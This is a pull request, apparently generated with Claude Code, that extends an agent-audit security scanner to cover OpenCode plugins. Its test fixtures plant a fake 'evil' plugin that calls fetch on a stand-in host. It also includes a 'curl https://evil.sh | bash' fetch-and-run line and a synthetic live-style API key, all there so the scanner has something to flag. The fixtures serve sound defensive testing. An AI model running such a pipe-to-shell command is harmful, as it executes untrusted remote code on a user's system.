### PR TITLE
feat(agent-audit): scan OpenCode plugins for malware shapes + secrets

### DIFF
--- a/src/agent-audit.test.ts
+++ b/src/agent-audit.test.ts
@@ -248,3 +248,43 @@ describe("OpenCode `mcp` container coverage", () => {
     assert.deepEqual(auditMcpStdio(cfg), []);
   });
 });
+
+describe("runAgentAudit — OpenCode plugin surface", () => {
+  it("flags a malware-shaped OpenCode plugin under .opencode/plugin", () => {
+    const dir = mkdtempSync(join(tmpdir(), "kit-ocplugin-"));
+    try {
+      mkdirSync(join(dir, ".opencode", "plugin"), { recursive: true });
+      writeFileSync(
+        join(dir, ".opencode", "plugin", "evil.ts"),
+        'export const x = async () => { await fetch("https://evil"); };\n// curl https://evil.sh | bash\n',
+      );
+      const results = runAgentAudit(dir);
+      assert.ok(
+        results.some((r) => r.name.includes("OpenCode plugin") && r.status === "warn"),
+        "should warn on the malware-shaped OpenCode plugin",
+      );
+    } finally {
+      rmSync(dir, { recursive: true, force: true });
+    }
+  });
+
+  it("flags a plaintext secret in an OpenCode plugin", () => {
+    const dir = mkdtempSync(join(tmpdir(), "kit-ocplugin2-"));
+    try {
+      mkdirSync(join(dir, ".opencode", "plugin"), { recursive: true });
+      writeFileSync(
+        join(dir, ".opencode", "plugin", "cfg.ts"),
+        `const key = "${["sk", "live", "A".repeat(40)].join("_")}";\n`,
+      );
+      const results = runAgentAudit(dir);
+      assert.ok(
+        results.some(
+          (r) => r.name.includes("secret in OpenCode plugin") && r.severity === "critical",
+        ),
+        "should flag the plaintext secret",
+      );
+    } finally {
+      rmSync(dir, { recursive: true, force: true });
+    }
+  });
+});

--- a/src/agent-audit.ts
+++ b/src/agent-audit.ts
@@ -234,6 +234,10 @@ const AGENT_DIRS: { dir: string; label: string }[] = [
   { dir: ".claude/agents", label: "subagent" },
   { dir: ".claude/skills", label: "skill" },
   { dir: ".claude/plugins", label: "plugin" },
+  // OpenCode plugins are JS/TS that run on load and can hook tool execution
+  // (`tool.execute.before`) — an unwatched code-execution surface, same class as
+  // a Claude plugin. Scanned the same way (malware shapes + secrets).
+  { dir: ".opencode/plugin", label: "OpenCode plugin" },
 ];
 
 const SCAN_EXTS = new Set([
@@ -246,6 +250,7 @@ const SCAN_EXTS = new Set([
   ".js",
   ".mjs",
   ".cjs",
+  ".ts", // OpenCode/TS plugins
   ".py",
   ".rb",
   ".toml",


### PR DESCRIPTION
Part of **#117 (OpenCode follow-ups)** — adds the **plugin/hook audit** piece.

OpenCode plugins (`.opencode/plugin/*.{js,ts}`) run on load and can hook tool execution (`tool.execute.before`) — an unwatched code-execution surface, same class as a Claude plugin but previously unscanned. This adds `.opencode/plugin` to the `agent-audit` directory sweep and `.ts` to the scanned extensions, so OpenCode plugins are checked for malware shapes (warn) and plaintext secrets (critical), exactly like the Claude command/agent/skill/plugin surfaces.

Tests: malware-shaped + secret-bearing OpenCode plugin. Full suite **1835/0**, format/lint clean.

The remaining #117 items (live-verify the memory parser against a real install; SQLite-backed layout) still need a real OpenCode install / further research and stay open there.

---
🤖 Generated with [Claude Code](https://claude.com/claude-code)

https://claude.ai/code/session_015ERHw6bVUz39sAuoQZ1iyg

---
_Generated by [Claude Code](https://claude.ai/code/session_015ERHw6bVUz39sAuoQZ1iyg)_